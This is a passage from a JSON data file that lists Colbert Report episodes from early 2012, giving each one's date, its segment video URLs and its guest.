        "http://thecolbertreport.cc.com/videos/o6dbzj/sign-off---mayan-headwear---sacrificial-chicken"
      ],
      "guest": "Steve Case"
    },
    {
      "date": "2012-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y3wl1i/intro---1-9-12",
        "http://thecolbertreport.cc.com/videos/3m6txc/new-hampshire-gop-debates",
        "http://thecolbertreport.cc.com/videos/l08ywe/new-hampshire-gop-debates---moderate-extremes",
        "http://thecolbertreport.cc.com/videos/75c0w9/rick-santorum-on-gay-parents---bla-people",
        "http://thecolbertreport.cc.com/videos/e3zsob/melissa-harris-perry",
        "http://thecolbertreport.cc.com/videos/j2sskk/sign-off---jack-daniels"
      ],
      "guest": "Neil Shubin"
    },
    {
      "date": "2012-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9llvcg/new-hampshire-primary---mitt-romney-s-gaffe",
        "http://thecolbertreport.cc.com/videos/m98f4t/tip-wag---irresponsible-dead-people---insensitive-papa-john-s",
        "http://thecolbertreport.cc.com/videos/wwvi39/malice-in-blunderland",
        "http://thecolbertreport.cc.com/videos/fqk2fh/bill-moyers",
        "http://thecolbertreport.cc.com/videos/wdmkv8/sign-off---turntable"
      ],
      "guest": "Ben Gibbard"
    },
    {
      "date": "2012-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bxzp6z/intro---1-11-12",
        "http://thecolbertreport.cc.com/videos/f8j0ng/commitment-to-mitt-romney",
        "http://thecolbertreport.cc.com/videos/7t7ct3/south-carolina-s-fresh-face",
        "http://thecolbertreport.cc.com/videos/73ux63/stephen-colbert-s-end-of-the-world-of-the-week---phobos-grunt",
        "http://thecolbertreport.cc.com/videos/wx04iy/george-stephanopoulos",
        "http://thecolbertreport.cc.com/videos/vjhrm3/sign-off---decision-of-a-lifetime"
      ],
      "guest": "George Stephanopoulos"
    },
    {
      "date": "2012-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hrwtsb/colbert-super-pac---coordination-problem",
        "http://thecolbertreport.cc.com/videos/av6bvx/colbert-super-pac---coordination-resolution-with-jon-stewart",
        "http://thecolbertreport.cc.com/videos/5otlsk/mike-d-s-hip-hop-semantics",
        "http://thecolbertreport.cc.com/videos/ui35sv/mike-allen",
        "http://thecolbertreport.cc.com/videos/mnp9up/sign-off---ipad-ebook"
      ],
      "guest": "Mike Allen"
    },
    {
      "date": "2012-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dyktip/colbert-super-pac-ad---not-abel",
        "http://thecolbertreport.cc.com/videos/lec1ln/intro---1-16-12",
        "http://thecolbertreport.cc.com/videos/ke9tkw/jon-huntsman-out--rick-santorum-in",
        "http://thecolbertreport.cc.com/videos/buf78z/colbert-super-pac---mitt-romney-attack-ad",
        "http://thecolbertreport.cc.com/videos/uh4wcy/the-word---raise-cain",
        "http://thecolbertreport.cc.com/videos/cgtb89/scott-douglas",
        "http://thecolbertreport.cc.com/videos/td091t/sign-off----this-is-herman-cain--"
      ],
      "guest": "Rev. Scott Douglas"
    },
    {
      "date": "2012-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/knvkbe/colbert-super-pac-ad---double-negative",
        "http://thecolbertreport.cc.com/videos/fe4nep/intro---1-17-12",
        "http://thecolbertreport.cc.com/videos/ufvy9m/colbert-super-pac---gop-attack-ads---herman-cain-ad",
        "http://thecolbertreport.cc.com/videos/qil57h/yahweh-or-no-way---online-christian-dating---seven-days-of-sex",
        "http://thecolbertreport.cc.com/videos/0alvjc/jennifer-granholm",
        "http://thecolbertreport.cc.com/videos/mbnjnn/sign-off---vote-for-herman-cain"
      ],
      "guest": "Jennifer Granholm"
    },
    {
      "date": "2012-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bpbhtr/colbert-super-pac-ad---modern-stage-combat",
        "http://thecolbertreport.cc.com/videos/2f7upq/intro---1-18-12",
        "http://thecolbertreport.cc.com/videos/q6xocp/newt-gingrich-s-performance---mitt-romney-s-tax-returns",
        "http://thecolbertreport.cc.com/videos/fx3xum/stephen-s-approval-rating",
        "http://thecolbertreport.cc.com/videos/zvmmfs/colbert-super-pac---civility-ad---stephen-s-south-carolina-rally",
        "http://thecolbertreport.cc.com/videos/orzoc4/sopa---pipa",
        "http://thecolbertreport.cc.com/videos/i8qam3/david-frum",
        "http://thecolbertreport.cc.com/videos/3mfkme/sign-off---south-carolina-rally-with-herman-cain"
      ],
      "guest": "David Frum"
    },
    {
      "date": "2012-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pebyno/troubled-gop-waters---stephen-under-attack",
        "http://thecolbertreport.cc.com/videos/7qvxgu/colbert-super-pac---john-paul-stevens",
        "http://thecolbertreport.cc.com/videos/k3pbui/carrie-rebora-barratt",
        "http://thecolbertreport.cc.com/videos/nno4x3/sign-off---flight-to-charleston--sc"
      ],
      "guest": "Carrie Rebora Barratt"
    },
    {
      "date": "2012-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kachyg/intro---1-23-12",
        "http://thecolbertreport.cc.com/videos/iql42n/newt-gingrich-s-south-carolina-kill",
        "http://thecolbertreport.cc.com/videos/50z46i/herman-cain-s-bittersweet-south-carolina-victory",
        "http://thecolbertreport.cc.com/videos/e3y9nd/rock-me-like-a-herman-cain-south-cain-olina-primary-rally---cain-elot-revisited",
        "http://thecolbertreport.cc.com/videos/vim94y/bruce-bueno-de-mesquita",
        "http://thecolbertreport.cc.com/videos/gu52h0/sign-off---sniffing-a-marker"
      ],
      "guest": "Bruce Bueno De Mesquita"
    },
    {
      "date": "2012-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n2rnnr/exclusive---rock-me-like-a-herman-cain-south-cain-olina-primary-rally-pt--1",
        "http://thecolbertreport.cc.com/videos/jc76hc/exclusive---rock-me-like-a-herman-cain-south-cain-olina-primary-rally-pt--2",
        "http://thecolbertreport.cc.com/videos/jog4lt/intro---1-24-12",
        "http://thecolbertreport.cc.com/videos/q3ro37/colbert-super-pac---hostage-crisis---day-2",
        "http://thecolbertreport.cc.com/videos/zop8mz/18th-gop-debate",
        "http://thecolbertreport.cc.com/videos/gzi3ec/grim-colberty-tales-with-maurice-sendak-pt--1",
        "http://thecolbertreport.cc.com/videos/kg7hw1/rick-santorum-s-senior-pandering",
        "http://thecolbertreport.cc.com/videos/381zai/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/14903e/sign-off---reading--bumble-ardy-"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2012-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9f0foj/2012-state-of-the-union-address---gop-rebuttals",
        "http://thecolbertreport.cc.com/videos/2uwi0i/grim-colberty-tales-with-maurice-sendak-pt--2",
        "http://thecolbertreport.cc.com/videos/3un4zv/un-american-news---china-edition",
        "http://thecolbertreport.cc.com/videos/kwuhk6/terry-gross",
        "http://thecolbertreport.cc.com/videos/r2j6o1/sign-off---colonel-tuxedo-s-cat-food"
      ],
      "guest": "Terry Gross"
    },
    {
      "date": "2012-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/05qh1w/colbert-super-pac---hostage-crisis---day-4",
        "http://thecolbertreport.cc.com/videos/5gcr8j/mitt-romney---newt-gingrich-in-florida",
        "http://thecolbertreport.cc.com/videos/pudtpb/sean-hannity-s--the-great-american-panel-",
        "http://thecolbertreport.cc.com/videos/y191mp/the-great-available-panel",
        "http://thecolbertreport.cc.com/videos/sg6jkh/drew-barrymore",
        "http://thecolbertreport.cc.com/videos/kk56ka/sign-off---football-throwing"
      ],
      "guest": "Drew Barrymore"
    },
    {
      "date": "2012-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rcm539/colbert-super-pac---the-great-chase",
        "http://thecolbertreport.cc.com/videos/1ws9v2/colbert-super-pac---return-of-the-pac",
        "http://thecolbertreport.cc.com/videos/n3pkmh/threatdown---barack-obama--fundamentalist-flippers---coked-up-diplomats",
        "http://thecolbertreport.cc.com/videos/tlfrhi/gop---the-hispanic-vote",
        "http://thecolbertreport.cc.com/videos/amck6x/laurence-tribe",
        "http://thecolbertreport.cc.com/videos/v9f5m2/sign-off---shouting-goodnight"
      ],
      "guest": "Laurence H. Tribe"
    },
    {
      "date": "2012-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/62pas5/intro---1-31-12",
        "http://thecolbertreport.cc.com/videos/f44hch/newt-gingrich-s-supporters",
        "http://thecolbertreport.cc.com/videos/udnnzi/the-word---american-history-x-d",
        "http://thecolbertreport.cc.com/videos/qs311n/bjork",
        "http://thecolbertreport.cc.com/videos/u7u9lh/sign-off----biophilia-"
      ],
      "guest": "Bjork"
    },
    {
      "date": "2012-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yk5cpe/intro---2-1-12",
        "http://thecolbertreport.cc.com/videos/o3p6c2/black-history-celebration-moment",
        "http://thecolbertreport.cc.com/videos/3nohh2/mitt-romney-s-florida-victory",
        "http://thecolbertreport.cc.com/videos/uswa0x/colbert-super-pac---americone-dream-super-pack",
        "http://thecolbertreport.cc.com/videos/kqctrf/ameena-matthews",
        "http://thecolbertreport.cc.com/videos/5m98im/sign-off---americone-dream-super-pack"
      ],
      "guest": "Ameena Matthews"
    },
    {
      "date": "2012-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4dia59/intro---2-2-12",
        "http://thecolbertreport.cc.com/videos/uu5zmj/the-meaning-of-groundhog-day",
        "http://thecolbertreport.cc.com/videos/bwbr2v/america-s-biggest-super-pac-donors",
        "http://thecolbertreport.cc.com/videos/lh3kq3/colbert-super-pac---thank-you",
        "http://thecolbertreport.cc.com/videos/04ottd/survivor-sues-newt-gingrich---dave-bickler",
        "http://thecolbertreport.cc.com/videos/a7r0zs/christiane-amanpour",
        "http://thecolbertreport.cc.com/videos/uzu0lz/sign-off---goodnight"
      ],
      "guest": "Christiane Amanpour"
    },
    {
      "date": "2012-02-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hhq4en/intro---2-13-12",
        "http://thecolbertreport.cc.com/videos/2kynbu/linsanity-",
        "http://thecolbertreport.cc.com/videos/hgxqxc/people-who-are-destroying-america---sawstop",
        "http://thecolbertreport.cc.com/videos/ju995r/stephen-colbert-s-free-americone-dream-day",
        "http://thecolbertreport.cc.com/videos/eks7za/bill-mckibben",
        "http://thecolbertreport.cc.com/videos/k6qadu/sign-off---colbert-nation-newborn"
      ],
      "guest": "Bill McKibben"
    },
    {
      "date": "2012-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u5h2yo/intro---2-14-12",
        "http://thecolbertreport.cc.com/videos/3rk6lv/westminster-kennel-club-dog-show-2012",
        "http://thecolbertreport.cc.com/videos/jx9ojl/contraception-crusade",
        "http://thecolbertreport.cc.com/videos/lyzukj/tip-wag---gay-building-marriage---transportation-safety-board-cell-phone-ban",
        "http://thecolbertreport.cc.com/videos/ej01p5/william-broad",
        "http://thecolbertreport.cc.com/videos/mhuyjx/sign-off---stephen-s-friend-lou-dog"
      ],
      "guest": "William Broad"
    },
    {
      "date": "2012-02-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f1ta15/intro---2-20-12",
        "http://thecolbertreport.cc.com/videos/7ghzcu/mitt-romney---donald-trump-in-michigan",
        "http://thecolbertreport.cc.com/videos/lydem1/rick-santorum-s-energy-war-alarm",
        "http://thecolbertreport.cc.com/videos/tqad40/ann-patchett",
        "http://thecolbertreport.cc.com/videos/qgsly5/sign-off---caught-looking"
      ],
      "guest": "Ann Patchett"
    },
    {
      "date": "2012-02-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vdtnp9/intro---2-21-12",
        "http://thecolbertreport.cc.com/videos/dgnc7d/douchebag-showdown",
        "http://thecolbertreport.cc.com/videos/mnahgd/colbert-super-pac---nancy-pelosi-s-ad---barack-obama-s-super-pac",
        "http://thecolbertreport.cc.com/videos/s0vtdx/robert-kagan",
        "http://thecolbertreport.cc.com/videos/x36uyb/sign-off---dark-lord-of-the-sith"
      ],
      "guest": "Robert Kagan"
    },
    {
      "date": "2012-02-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n05gam/intro---2-22-12",
        "http://thecolbertreport.cc.com/videos/krghr1/stephen-s-lenten-sacrifice",
        "http://thecolbertreport.cc.com/videos/dv9iqc/the-word---surrender-to-a-buyer-power",
        "http://thecolbertreport.cc.com/videos/w2qw1t/better-know-a-district---california-s-8th",
        "http://thecolbertreport.cc.com/videos/d6raxz/nancy-pelosi",
        "http://thecolbertreport.cc.com/videos/9mdx7s/sign-off---conquistador-sacrifice"
      ],
      "guest": "Rep. Nancy Pelosi"
    },
    {
      "date": "2012-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g3b2me/arizona-gop-debate",
        "http://thecolbertreport.cc.com/videos/6wnf2j/posthumous-mormon-baptism",
        "http://thecolbertreport.cc.com/videos/zzgfft/wheat-thins-sponsortunity",
        "http://thecolbertreport.cc.com/videos/jshg47/placido-domingo"
      ],
      "guest": "Placido Domingo"
    },
    {
      "date": "2012-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6llqzw/mitt-romney-s---rick-santorum-s-michigan-campaigns",
        "http://thecolbertreport.cc.com/videos/45yrtw/peggielene-bartels",
        "http://thecolbertreport.cc.com/videos/xr2dmf/sign-off---goodnight"
      ],
      "guest": "Peggielene Bartels"
    },
    {
      "date": "2012-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l484x8/intro---2-28-12",
        "http://thecolbertreport.cc.com/videos/b44eo3/the-colbert-report-s-1000th-show",
        "http://thecolbertreport.cc.com/videos/hsyhov/rising-oil-prices---john-kilduff",
        "http://thecolbertreport.cc.com/videos/gqa08a/mr--smith-goes-to-the-state-legislature--then-later-possibly-washington---bob-morris---kyle-jones",
        "http://thecolbertreport.cc.com/videos/0xatad/ross-eisenbrey",
        "http://thecolbertreport.cc.com/videos/8ebxgr/stephen-s-1000th-ticket"
      ],
      "guest": "Ross Eisenbrey"
    },
    {
      "date": "2012-02-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ueosv6/intro---2-29-12",
        "http://thecolbertreport.cc.com/videos/y0ejfo/countdown-to-loving-mitt",
        "http://thecolbertreport.cc.com/videos/3dllp7/the-word---change-we-can-believe-in",
        "http://thecolbertreport.cc.com/videos/3adb3i/tip-wag---kansas--male-birth-control-pill---new-york-s-babyccino",
        "http://thecolbertreport.cc.com/videos/puth71/william-shatner",
        "http://thecolbertreport.cc.com/videos/dhcxcx/sign-off---goodnight"
      ],
      "guest": "William Shatner"
    },
    {
      "date": "2012-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eolisf/countdown-to-loving-mitt---jeb-bush",
        "http://thecolbertreport.cc.com/videos/bf1ekb/people-who-are-destroying-america---teachers",
        "http://thecolbertreport.cc.com/videos/ncu1ti/mysteries-of-the-ancient-unknown---yo-mama-jokes",
        "http://thecolbertreport.cc.com/videos/tw0ear/claire-danes",
        "http://thecolbertreport.cc.com/videos/4gz8ak/sign-off---jeb-bush-s-portrait"
      ],
      "guest": "Claire Danes"
    },
    {
      "date": "2012-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xceapv/countdown-to-loving-mitt---super-tuesday",
        "http://thecolbertreport.cc.com/videos/29dn96/rush-limbaugh-apologizes-to-sandra-fluke",
        "http://thecolbertreport.cc.com/videos/pww7ru/sport-report---pete-weber--danica-patrick---the-new-orleans-saints",
        "http://thecolbertreport.cc.com/videos/nwk5lf/audra-mcdonald"
      ],
      "guest": "Audra McDonald"
    },
    {
      "date": "2012-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4yvx5w/super-tuesday-party--putin-s-win---india-s-state-assembly",
        "http://thecolbertreport.cc.com/videos/nzr8wl/the-word---due-or-die",
        "http://thecolbertreport.cc.com/videos/rxyz0z/thought-for-food---responsible-snacking---second-breakfast",
        "http://thecolbertreport.cc.com/videos/h24vfx/jonathan-safran-foer",
        "http://thecolbertreport.cc.com/videos/em4ksp/sign-off---good-catch"
      ],
      "guest": "Jonathan Safran Foer"
    },
    {
      "date": "2012-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i93vkc/intro---3-7-12",
        "http://thecolbertreport.cc.com/videos/3df60s/higgs-boson-humor",
        "http://thecolbertreport.cc.com/videos/y5rjly/countdown-to-loving-mitt---super-tuesday-results",
        "http://thecolbertreport.cc.com/videos/7v4ikl/cyber-republican-convention",
        "http://thecolbertreport.cc.com/videos/ciyqhs/iranian-irony-threat",
        "http://thecolbertreport.cc.com/videos/060vqq/willem-dafoe",
        "http://thecolbertreport.cc.com/videos/c0qp1t/sign-off---goodnight"
      ],
      "guest": "Willem Dafoe"
    },
    {
      "date": "2012-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3nl0qx/eric-bolling-s-secret-gas-prices-plan",
        "http://thecolbertreport.cc.com/videos/fig5ri/herman-cain-s-avant-garde-pac-ad"
      ],
      "guest": "Don Fleming, Elvis Costello, Emmylou Harris"
    },
    {
      "date": "2012-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c4fdt8/daylight-savings-socialism",
        "http://thecolbertreport.cc.com/videos/2v3qmo/republicans--southern-strategy",
        "http://thecolbertreport.cc.com/videos/lo9wk9/republicans--southern-strategy---dave--mudcat--saunders",
        "http://thecolbertreport.cc.com/videos/16w3vh/cheating-death---bacon-cure-for-nosebleeds---sound-wave-sterility",
        "http://thecolbertreport.cc.com/videos/nmtsxp/katherine-boo",
        "http://thecolbertreport.cc.com/videos/owkzk2/sign-off---goodnight-with-a-smile"
      ],
      "guest": "Katherine Boo"
    },
    {
      "date": "2012-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bz7jdm/who-s-not-honoring-me-now----seattle-s-pop-conference",
        "http://thecolbertreport.cc.com/videos/qn0q26/threatdown---stoned-pat-robertson--muslim-american-reality-tv---pampered-bears",
        "http://thecolbertreport.cc.com/videos/h98570/republican-southern-primary---simplified-speeches",
        "http://thecolbertreport.cc.com/videos/msz5qh/andrew-bird"
      ],
      "guest": "Andrew Bird"
    },
    {
      "date": "2012-03-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m77cwc/greg-smith-s-goldman-sachs-op-ed",
        "http://thecolbertreport.cc.com/videos/rwxeui/republican-southern-primary---rick-santorum-against-teleprompters",
        "http://thecolbertreport.cc.com/videos/yeczkv/republican-southern-primary---kermit-the-frog",
        "http://thecolbertreport.cc.com/videos/7n8gsd/monkey-on-the-lam---alabama",
        "http://thecolbertreport.cc.com/videos/zkum1o/mark-mckinnon",
        "http://thecolbertreport.cc.com/videos/d8t6uu/sign-off---goodnight"
      ],
      "guest": "Mark McKinnon"
    },
    {
      "date": "2012-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eq8308/airport-security-for-senior-citizens",
        "http://thecolbertreport.cc.com/videos/zjy3q9/rush-limbaugh-loses-more-sponsors",
        "http://thecolbertreport.cc.com/videos/krx9gw/rick-santorum-visits-puerto-rico-and-speaks-from-his-heart",
        "http://thecolbertreport.cc.com/videos/vh5p5b/ireland-s-imported-sperm---ethnically-accurate-headgear",
        "http://thecolbertreport.cc.com/videos/8o29gb/dexter-filkins",
        "http://thecolbertreport.cc.com/videos/e66q9g/sign-off---goodnight"
      ],
      "guest": "Dexter Filkins"
    },
    {
      "date": "2012-03-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/no5p1a/exclusive---david-page-extended-interview",
        "http://thecolbertreport.cc.com/videos/a8lnqt/intro---3-26-12",
        "http://thecolbertreport.cc.com/videos/3ejcul/stephen-s-spring-break",
        "http://thecolbertreport.cc.com/videos/008ndt/the-word---dressed-to-kill",
        "http://thecolbertreport.cc.com/videos/7faawr/mitt-romney-etch-a-sketch-comparison",
        "http://thecolbertreport.cc.com/videos/rc1xqe/david-page",
        "http://thecolbertreport.cc.com/videos/20xgt7/sign-off---goodnight"
      ],
      "guest": "Dr. David Page"
    },
    {
      "date": "2012-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rk3w4e/intro---3-27-12",
        "http://thecolbertreport.cc.com/videos/cua8o6/barack-obama-gun-control-conspiracy",
        "http://thecolbertreport.cc.com/videos/ykhpki/tip-wag---anti-prejudice-drug---dick-cheney-s-heart",
        "http://thecolbertreport.cc.com/videos/53yh09/thought-for-food---tacocopter",
        "http://thecolbertreport.cc.com/videos/ghn5jt/charles-murray",
        "http://thecolbertreport.cc.com/videos/y9plha/sign-off---goodnight"
      ],
      "guest": "Charles Murray"
    },
    {
      "date": "2012-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lg7nrp/the-supreme-court-weighs-in-on-obamacare",
        "http://thecolbertreport.cc.com/videos/svf90k/the-supreme-court-weighs-in-on-obamacare---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/tnvz1z/the-conservative-teen",
        "http://thecolbertreport.cc.com/videos/bmkpwj/mark-ruffalo",
        "http://thecolbertreport.cc.com/videos/jjebsm/sign-off---goodnight-snack"
      ],
      "guest": "Mark Ruffalo"
    },
    {
      "date": "2012-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7erwuh/stephen-offers-colbert-super-pac-super-fun-pack",
        "http://thecolbertreport.cc.com/videos/9bgxui/intro---3-29-12",
        "http://thecolbertreport.cc.com/videos/nuvo4m/the-mega-millions-lottery",
        "http://thecolbertreport.cc.com/videos/7qagdx/colbert-super-pac---texan-supporters---super-fun-pack",
        "http://thecolbertreport.cc.com/videos/2m6prp/mitt-romney-tells-a-funny-story",
        "http://thecolbertreport.cc.com/videos/7dpy0t/peter-beinart",
        "http://thecolbertreport.cc.com/videos/r5oifs/sign-off---colbert-super-pac-super-fun-pack"
      ],
      "guest": "Peter Beinart"
    },
    {
      "date": "2012-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8f8tya/intro---4-2-12",
        "http://thecolbertreport.cc.com/videos/1nq1ce/colbert-super-pac---super-fun-pack-treasure-hunt",
        "http://thecolbertreport.cc.com/videos/1bsxs9/the-beefstate-governors",
        "http://thecolbertreport.cc.com/videos/fmif88/yahweh-or-no-way---christian-card-counters--pope-benedict-on-marxism---pope-cologne",
        "http://thecolbertreport.cc.com/videos/5yl006/gary-johnson",
        "http://thecolbertreport.cc.com/videos/77h3h1/sign-off---goodnight"
      ],
      "guest": "Gov. Gary Johnson"
    },
    {
      "date": "2012-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/33j3ar/lftb-colbology",
        "http://thecolbertreport.cc.com/videos/z52jo4/colbert-super-pac---super-fun-pack-not-legal-advice---certificate-of-presidenthood",
        "http://thecolbertreport.cc.com/videos/v3p6ss/colbert-super-pac-shh----501c4-disclosure",
        "http://thecolbertreport.cc.com/videos/ag45p1/colbert-super-pac-shh----501c4-disclosure---trevor-potter",
        "http://thecolbertreport.cc.com/videos/y4berw/rick-santorum-speaks-from-his-heart---california-colleges",
        "http://thecolbertreport.cc.com/videos/1b9vpb/nikki-haley",
        "http://thecolbertreport.cc.com/videos/asl5su/sign-off---helmeted-ham-rove"
      ],
      "guest": "Gov. Nikki Haley"
    },
    {
      "date": "2012-04-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2ihe55/intro---4-4-12",
        "http://thecolbertreport.cc.com/videos/6y1ct4/peabody-award-for-colbert-super-pac",
        "http://thecolbertreport.cc.com/videos/4io3p9/settling-for-mitt-romney",
        "http://thecolbertreport.cc.com/videos/x8e4ps/colbert-super-pac---republicans---the-latino-vote",
        "http://thecolbertreport.cc.com/videos/6ml3sk/wilford-brimley-calls---quaker-oats-makeover",
        "http://thecolbertreport.cc.com/videos/plj4a3/robert-ballard",
        "http://thecolbertreport.cc.com/videos/qyyf0b/sign-off---second-peabody-award"
      ],
      "guest": "Robert D. Ballard"
    },
    {
      "date": "2012-04-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/om9vmg/bad-news-about-good-unemployment-news",
        "http://thecolbertreport.cc.com/videos/lnmh56/colbert-s-very-wanted---manatee-mailbox",
        "http://thecolbertreport.cc.com/videos/0u9fik/dirt-bike-badass-in-the-lincoln-tunnel",
        "http://thecolbertreport.cc.com/videos/ji5xxu/anne-rice",
        "http://thecolbertreport.cc.com/videos/si0xcn/sign-off---lincoln-tunnel"
      ],
      "guest": "Anne Rice"
    },
    {
      "date": "2012-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ziziz/easter-under-attack---bunny-vs--bilby",
        "http://thecolbertreport.cc.com/videos/oyaen8/searching-for-mr--right---mitt-romney---iowa-s-steve-king",
        "http://thecolbertreport.cc.com/videos/csp74m/stephen-colbert-s-shame-spiral---senior-citizen-gymnasts",
        "http://thecolbertreport.cc.com/videos/kruk2j/bob-lutz",
        "http://thecolbertreport.cc.com/videos/9wc34u/sign-off---remembering-mike-wallace"
      ],
      "guest": "Bob Lutz"
    },
    {
      "date": "2012-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2n6qw1/intro---4-10-12",
        "http://thecolbertreport.cc.com/videos/82ub2z/rick-santorum-leaves-presidential-race",
        "http://thecolbertreport.cc.com/videos/qu7492/i-got-the-tweets-like-grassley",
        "http://thecolbertreport.cc.com/videos/3la5nh/tip-wag---coal-industry-crackdown---box-spring-bunker",
        "http://thecolbertreport.cc.com/videos/mfxyfn/stephen-colbert-s-lady-heroes---glen-grothman",
        "http://thecolbertreport.cc.com/videos/o4ah40/richard-hersh",
        "http://thecolbertreport.cc.com/videos/es5mrc/sign-off---goodnight"
      ],
      "guest": "Richard Hersh"
    },
    {
      "date": "2012-04-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ygjj0/amped-up-for-michelle-obama",
        "http://thecolbertreport.cc.com/videos/bc3gqm/the-word---whuh-how-",
        "http://thecolbertreport.cc.com/videos/ingur1/employing-a-veteran---sergeant-bryan-escobedo",
        "http://thecolbertreport.cc.com/videos/f8r4k5/michelle-obama-pt--1",
        "http://thecolbertreport.cc.com/videos/v3wlgc/michelle-obama-pt--2",
        "http://thecolbertreport.cc.com/videos/u0cci1/sign-off---goodnight"
      ],
      "guest": "Michelle Obama"
    },
    {
      "date": "2012-04-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pzrkzg/intro---4-12-12",
        "http://thecolbertreport.cc.com/videos/m5gmsh/the-other-war-on-women",
        "http://thecolbertreport.cc.com/videos/v73czf/stephen-colbert-s-end-of-the-world-of-the-week---survivalist-singles---tsunami-food",
        "http://thecolbertreport.cc.com/videos/s55d89/cold-war-update---alleged-congressional-communists",
        "http://thecolbertreport.cc.com/videos/x9epzo/james-cameron",
        "http://thecolbertreport.cc.com/videos/avonwu/sign-off---goodnight"
      ],
      "guest": "James Cameron"
    },
    {
      "date": "2012-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z2fjas/a-beautiful-war-for-women-segment",
        "http://thecolbertreport.cc.com/videos/2ixpov/secret-service-sex-scandal",
        "http://thecolbertreport.cc.com/videos/ilt6wv/a-beautiful-war-for-women",
        "http://thecolbertreport.cc.com/videos/44j8wl/newt-gingrich---gun-rights",
        "http://thecolbertreport.cc.com/videos/ru5vnr/bonnie-raitt"
      ],
      "guest": "Bonnie Raitt"
    },
    {
      "date": "2012-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wpng4g/intro---4-17-12",
        "http://thecolbertreport.cc.com/videos/gxlf9b/mitt-romney-s-dinner-table-pranks",
        "http://thecolbertreport.cc.com/videos/sfsf06/thought-for-food---bug-food-coloring--hot-dog-stuffed-crust---drugged-poultry",
        "http://thecolbertreport.cc.com/videos/vklngm/gsa-spending-scandal",
        "http://thecolbertreport.cc.com/videos/6fhp9q/jonah-lehrer",
        "http://thecolbertreport.cc.com/videos/culsks/sign-off---goodnight"
      ],
      "guest": "Jonah Lehrer"
    },
    {
      "date": "2012-04-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q3i7x8/intro---4-18-12",
        "http://thecolbertreport.cc.com/videos/ddq41n/searching-for-mr--right---mitt-romney---ohio-s-rob-portman",
        "http://thecolbertreport.cc.com/videos/er0kn7/the-word---gateway-hug",
        "http://thecolbertreport.cc.com/videos/vw1qdm/stephen-colbert-s-end-of-the-world-of-the-week---doomsday-preppers",
        "http://thecolbertreport.cc.com/videos/xzzk73/arianna-huffington",
        "http://thecolbertreport.cc.com/videos/tttdob/sign-off---goodnight-kiss"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2012-04-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hrfl05/intro---4-19-12",
        "http://thecolbertreport.cc.com/videos/a9n2pr/stephen-s-4-20-message",
        "http://thecolbertreport.cc.com/videos/zdgaqc/alpha-dog-of-the-week---cory-booker",
        "http://thecolbertreport.cc.com/videos/nb2ksl/the-enemy-within---bologna-border-bust",
        "http://thecolbertreport.cc.com/videos/uio9bo/time-s-2012-top-100-most-influential",
        "http://thecolbertreport.cc.com/videos/h2p67e/tavis-smiley---cornel-west",
        "http://thecolbertreport.cc.com/videos/g291q8/sign-off---time-s-top-100"
      ],
      "guest": "Tavis Smiley & Cornel West"
    },
    {
      "date": "2012-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4wypj5/intro---4-23-12",
        "http://thecolbertreport.cc.com/videos/m8blpo/steve-doocy-s-silver-spoon-subtext-reporting",
        "http://thecolbertreport.cc.com/videos/2gwl1y/tip-wag--pheromone-parties---arizona-s--pre-life--laws",
        "http://thecolbertreport.cc.com/videos/v2y3wl/mitt-romney-s-picnic-gaffe",
        "http://thecolbertreport.cc.com/videos/14wyxm/don-mcleroy",
        "http://thecolbertreport.cc.com/videos/l9d2q6/sign-off---goodnight"
      ],
